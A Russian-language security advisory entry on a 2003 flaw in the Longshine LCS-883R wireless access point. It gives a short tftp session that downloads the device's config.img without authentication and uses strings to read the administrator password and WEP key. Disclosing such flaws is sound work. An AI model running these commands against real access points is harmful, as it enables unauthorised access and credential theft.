Дата публикации: | 10.01.2003 |
Дата изменения: | 17.10.2006 |
Всего просмотров: | 1078 |
Опасность: | |
Наличие исправления: | |
Количество уязвимостей: | 1 |
CVE ID: | Нет данных |
Вектор эксплуатации: | |
Воздействие: | |
CWE ID: | Нет данных |
Наличие эксплоита: | Нет данных |
Уязвимые продукты: | |
Описание: | Обнаруженная уязвимость в Longshine WLAN Access-Point LCS-883R позволяет атакующему загрузить конфигурацию устройства через tftp, не зная WEP Secret. Также атакующий может получить неавторизованный доступ к паролю администратора RADIUS сервера. Это "нападение" работает через WLAN (!!!) и Ethernet. Пример :
tftp tftp> connect 192.168.108.48 tftp> get config.img Received 780 bytes in 1.0 seconds tftp> quit [~]/-\>strings config.img DNXLABAP01 <- name of the AP root <- name of the superuser XXXXXX123 <- password from superuser DNXLABLAN <- ssid secu9 <- secret for WEP 7890abcdef <-Также можно загрузить следующие файлы - config.img, wbtune.dat, mac.dat, rom.img, normal.img Уязвимость обнаружена в Longshine LCS-883R-AC-B External WLAN Access Point 22 Mbps и ThreadX ARM7/Green Hills Version G3.0f.3.0c from Express Logic Inc. |
Ссылки: | Longshine WLAN Access-Point LCS-883R VU#310201 |